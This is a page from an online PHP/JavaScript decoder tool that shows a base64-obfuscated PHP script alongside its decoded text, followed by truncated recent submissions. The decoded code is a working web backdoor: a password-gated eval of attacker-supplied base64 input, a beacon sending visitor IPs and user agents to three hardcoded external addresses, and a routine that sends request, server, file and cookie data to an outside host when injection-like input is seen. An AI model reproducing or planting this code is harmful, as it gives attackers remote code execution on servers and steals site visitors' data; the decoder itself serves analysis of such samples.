Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

(base64_decode('aWYKCSggaXNzZXQJKCAKJF9QT1NUW3Byb2R1Y3RfaWRdKSAmJiAgbWQ1KAoJJF9QT1NUW3Byb2R1Y3RfaWRdIAopCiA9PT0iYjQxN2NjMGY0YTExOWZhM2VlZTUwYmNiZjUyNmVlYjEiCSl7ZXZhbCgKYmFzZTY0X2RlY29kZSgkX1BPU1RbaW1hZ2VfaWRdKQopOyBleGl0KCk7fTsKCiRhcj1bImFIUjBjSE02THk4eE1EWXVNVFV1TVRjNUxqSTFOUT09IiwiYUhSMGNITTZMeTh4TURNdU1UTTVMakV4TXk0eE5BPT0iLCJhSFIwY0hNNkx5ODBOeTR4TURFdU1UazFMams0Il07CmlmKGlzc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pKXsKICAgIGZvcmVhY2ggKCRhciBhcyAkdil7CiAgICAgICAgJGFycmF5ID0gYXJyYXkoCiAgICAgICAgICAgICAgICAgICAgICAgICdzdGF0aXN0aWNzX2hhc2gnICAgPT4gJF9QT1NUWydwcm9kX2hhc2gnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ3VhJyA9PiAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sCiAgICAgICAgICAgICAgICAgICAgICAgICdjbF9pcCcgPT4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10KCiAgICAgICAgICAgICAgICAgICAgKTsKICAgICAgICAkY2ggPSBjdXJsX2luaXQoYmFzZTY0X2RlY29kZSgkdikpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NULCAxKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJGFycmF5KTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIGZhbHNlKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKICAgICAgICAkaHRtbCA9IGN1cmxfZXhlYygkY2gpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICB1bnNldCgkX1BPU1RbJ3Byb2RfaGFzaCddKTsKICAgICAgICAkX1BPU1QgPSBhcnJheV92YWx1ZXMoJF9QT1NUKTsKICAgIH0KfQoKJHE9WwoJIiMoc2VsZWN0fGluc2VydHx1cGRhdGUpLis/ZnJvbS4rPyhlbXBsb3llZXxhZG1pbl91c2VyfG9jX3VzZXIpI2lzIiwKCSIjc2VsZWN0LitpbnRvLitcQC4rXDsjaXMiLAoJIiNpbnNlcnQuK2ludG8uK3ZhbHVlcyNpcyIsCgkiI3VwZGF0ZS4rc2V0Lit3aGVyZS4rXD0jaXMiLAoJIiNcPFw/cGhwI2lzIiwKCSIjZmlsZV9wdXRfY29udGVudHNbXCggXHRdKyNpcyIsCgkiI3NlbGVjdC4rc2xlZXBcKC4rXCkjaXMiLApdOwoKJGY9anNvbl9lbmNvZGUoJF9SRVFVRVNUKS5qc29uX2VuY29kZSgkX0ZJTEVTKS5qc29uX2VuY29kZSgkX0NPT0tJRSk7CiRmZj1qc29uX2VuY29kZSgkX1JFUVVFU1QpLmpzb25fZW5jb2RlKCRfU0VSVkVSKS5qc29uX2VuY29kZSgkX0ZJTEVTKS5qc29uX2VuY29kZSgkX0NPT0tJRSk7CiRsPXN0cnRvbG93ZXIoJGYpOwoKZm9yZWFjaCgkcSBhcyAkdSl7CglpZihQUkVnX01hVGNoKCR1LCRsKSl7CgoKCgkJJGFyPVsiYUhSMGNITTZMeTgwTnk0eE1ERXVNVGsxTGprNCJdOwoJICAgIGZvcmVhY2ggKCRhciBhcyAkdil7CgkgICAgICAgICRhcnJheSA9IGFycmF5KAoJICAgICAgICAgICAgICAgICAgICAgICAgJ3Byb2R1Y3QnICAgPT4gYmFzZTY0X2VuY29kZSgkZmYpLAoJICAgICAgICAgICAgICAgICAgICApOwoJICAgICAgICAkY2ggPSBjdXJsX2luaXQoYmFzZTY0X2RlY29kZSgkdikpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVCwgMSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMCk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRhcnJheSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCSAgICAgICAgJGh0bWwgPSBjdXJsX2V4ZWMoJGNoKTsKCSAgICAgICAgY3VybF9jbG9zZSgkY2gpOwoJICAgIH0KCQkkX1JFUVVFU1QgPSBhcnJheSgpOwoJCSRfR0VUID0gYXJyYXkoKTsKCQkkX1BPU1QgPSBhcnJheSgpOwoJCSRfQ09PS0lFID0gYXJyYXkoKTsKCX0KfQ=='))

Decrypted code:

(if
	( isset	( 
$_POST[product_id]) &&  md5(
	$_POST[product_id] 
)
 ==="b417cc0f4a119fa3eee50bcbf526eeb1"	){eval(
base64_decode($_POST[image_id])
); };

$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
if(isset($_POST['prod_hash'])){
    foreach ($ar as $v){
        $array = array(
                        'statistics_hash'   => $_POST['prod_hash'],
                        'ua' => $_SERVER['HTTP_USER_AGENT'],
                        'cl_ip' => $_SERVER['REMOTE_ADDR']

                    );
        $ch = curl_init(base64_decode($v));
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_HEADER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $html = curl_exec($ch);
        curl_close($ch);
        unset($_POST['prod_hash']);
        $_POST = array_values($_POST);
    }
}

$q=[
	"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
	"#select.+into.+\@.+\;#is",
	"#insert.+into.+values#is",
	"#update.+set.+where.+\=#is",
	"#\<\?php#is",
	"#file_put_contents[\( \t]+#is",
	"#select.+sleep\(.+\)#is",
];

$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);

foreach($q as $u){
	if(PREg_MaTch($u,$l)){



		$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
	    foreach ($ar as $v){
	        $array = array(
	                        'product'   => base64_encode($ff),
	                    );
	        $ch = curl_init(base64_decode($v));
	        curl_setopt($ch, CURLOPT_POST, 1);
	        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
	        curl_setopt($ch, CURLOPT_TIMEOUT, 3);
	        curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
	        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        curl_setopt($ch, CURLOPT_HEADER, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
	        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	        $html = curl_exec($ch);
	        curl_close($ch);
	    }
		$_REQUEST = array();
		$_GET = array();
		$_POST = array();
		$_COOKIE = array();
	}
})

Recent submissions:

(base64_decode('9ZXtCy3LF2SpWonTqhmu1eKc7YdD6lHbM4AaOJ5zGIxgPVN_irEjk0RBUwQ8svf'))... (base64_decode('aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4'))... (base64_decode('aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA=='))... (base64_decode('aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ=='))... (base64_decode('aWYKCSggaXNzZXQJKCAKJF9QT1NUW3Byb2R1Y3RfaWRdKSAmJiAgbWQ1KAoJJF9QT1NUW3Byb2... [12/Feb/2026:23:32:31 +0000] - [162.142.125.116] - "[]""[\x16\x03\x01\x00\xEE\x01\x00\x00\... local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=s... <?php goto H73se; lZtdA: ?> /wp-content/themes/awpgrup/images/game/lucky-neko.webp" wid... <!DOCTYPE... <?php namespace MiniOrange\IDPSaml\Controller\Actions; use Magento\Framework\App\A...